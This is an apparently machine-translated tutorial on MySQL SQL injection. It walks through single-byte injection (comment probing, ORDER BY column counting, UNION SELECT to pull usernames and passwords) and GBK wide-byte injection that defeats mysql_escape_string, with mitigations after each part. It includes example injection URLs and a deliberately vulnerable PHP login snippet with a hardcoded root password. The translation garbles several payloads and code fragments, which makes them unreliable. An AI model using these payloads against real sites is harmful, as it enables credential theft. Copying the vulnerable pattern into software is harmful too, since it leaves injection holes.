Single-byte and wide-byte SQL Injection in MySQL

1. single-byte SQL Injection

Mysql SQL injection has been around for a long time. The following are the common injection steps:

1. Add/* or # To the GET parameter to determine whether the database is mysql. For example:
Http://www.xxx.com.cn/article.php? Id = 1607 and 1 = 1 /*

2. Guess the number of fields in a table. The number of fields in the table can be obtained from order by 1 until an error occurs on the page.

Inject URL: http://www.xxx.com.cn/article.php? Id = 1607 or 1 = 1 order by 10 #

Corresponding SQL: select * from articles where id = 1607 or 1 = 1 order by 10 #....
 

3. Use this table for association query with the user table. the user name and password are displayed in the article list. When you want to guess the table name and username and password field name of the user table, for example, the number of fields obtained in the previous step is 5:

Injection URL: http://www.xxx.com.cn/article.php? Id = 1607 or 1 = 1 union select username, password, 3 from user

Corresponding SQL: select * from articles where id = 1607 or 1 = 1 union select username, password, 3 from user
 

In this way, you can see the user name and password on the interface.

Solution:

Filter data: This is not Luo Yun. Using good data filtering in the right place can reduce most security risks and even eliminate some of them.

Enclose data in parentheses: If your database permits (MySQL permits), no matter what type of data is included in SQL statements, single quotation marks are used.

Escape data: some valid data may inadvertently damage the SQL statement format. Use mysql_escape_string () or the transfer function provided by the database. If such a function is not provided, addslashes () is also a good final choice.

Ii. wide byte Injection

Wide-byte injection is also a problem found in recent projects. We all know that % df is escaped by PHP (using GPC, using addslashes function, or icov), and a backslash is added to single quotes, changed to % df, where \'s hexadecimal format is % 5C. Now % df '= % df % 5c % 27. If the program's default character set is GBK's Equal-width Byte Character Set, when MYSQL uses GBK encoding, % df % 5c is considered to be a wide character, that is, comment, that is, % df '= % df % 5c % 27 = comment ', with Single quotes, it is easy to inject. For example:

$ Conn = mysql_connect ("localhost", "root", "2sdfxedd"); mysql_query ("set names 'gbk'"); mysql_select_db ("test", $ conn ); $ user = mysql_escape_string ($ _ GET [user]); $ pass = mysql_escape_string ($ _ GET [pass]); $ SQL = "select * from cms_user where username = '$ user' and password =' $ pass'"; $ result = mysql_query ($ SQL, $ conn ); while ($ row = mysql_fetch_array ($ result, MYSQL_ASSOC) {$ rows [] = $ row ;}?>
 

Run the following injection:
Http://www.xxx.com/login.php? User = % df '% 20or % 201 = 1% 20 limit % ,,1% 23 & pass =

The corresponding SQL statement is:
Select * from cms_user where username = 'run' or 1 = 1 limit 1, 1 # 'and password ="
 

Solution: after the connection and character SET are initialized, SET character_set_client = binary is used to SET the character SET of the client to binary. For example:
Mysql_query ("SET character_set_client = binary ");